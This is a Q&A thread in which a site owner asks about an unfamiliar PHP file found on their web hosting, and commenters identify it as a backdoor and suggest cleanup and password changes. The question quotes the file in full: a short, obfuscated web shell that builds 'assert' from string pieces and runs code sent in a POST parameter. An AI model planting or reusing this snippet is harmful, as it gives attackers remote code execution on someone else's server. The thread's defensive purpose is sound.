# mysterious php file has appeared, can you help me figure out what it is

Tags: php, security, hosting

I was uploading a file to my web hosting and noticed that a file called thankyou.php has appeared. I don't recall ever having seen this file or this code before. Alarmingly, the file, plus my favicon have last modified times four hours after I would have been making changes.
Can you advise me on whether the code below means anything? note the spaces after the last character of each line. It's been so long since I dabbled in php, and it was just a dabble.

```
<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
```

Comment: You're probably infected.

Comment: https://translate.google.com/translate?hl=en&sl=zh-CN&u=http://s0ul.tk/%3Fp%3D49&prev=search

Comment: @SLaks I think you're right, I'm just trying to get more detail out of curiosity mainly.

Comment: googled the whole script and google says you have a backdoor

Comment: @bassxzero I'm such an idiot, I assumed google wouldn't be effective with all the symbols so I didn't even bother. obviously this is worrying, but it's not my server.. I'm using 123-reg hosting.

Comment: google knows all. forgot your password? ask google or the NSA

Comment: @bassxzero is there anything I should do? I basically can just edit the files and the ftp password.. surely this is more 123-reg's problem? thanks for your help anyway

Comment: A lot of FTP credential compromises come from client-side compromises on machines used to connect to the FTP server, so check your desktop machine. Also, FTP is a woefully insecure protocol that nobody should be using in 2016.

Answer (score 1, accepted):

This can only be an infection in your files. This might not even be the only one. The best thing you can do is check all your files on this sort of infections.

If you have done that, change all your passwords like FTP and database.

Whatever you do, DO NOT change password BEFORE checking the files. They may have made something to get your password changes (PHP mostly).

Comment: I can't really figure out where this thing could be hiding. As of a few hours before the file appeared, it's a barebones "under construction page". I have a favicon, index.php (26 lines) and styles.css (51 lines). None of the files have changed size either. I just did a virustotal scan on all the files and they're clear, and 123-reg don't allow access to anything other than public_html. Any ideas? or shall I just change the password and be done.

Comment: @l0k did you check your access logs?

Comment: @bassxzero it seems 123-reg don't provide access to logs that would show changes to files on the server etc, they just have logs showing when visitors/crawlers have requested the site. and there's nothing suspicious on those

Comment: @l0k ssh, ftp, sudo logs? anything

Comment: @bassxzero nah also not available. 123-reg are overwhelmingly crap. if I was still trying to run a website I'd switch provider, this is only the most recent reason

Comment: If you checked the files and you are sure to have no infections left on your server, you can change the password. The file you found might be a failed attempt to break into your website.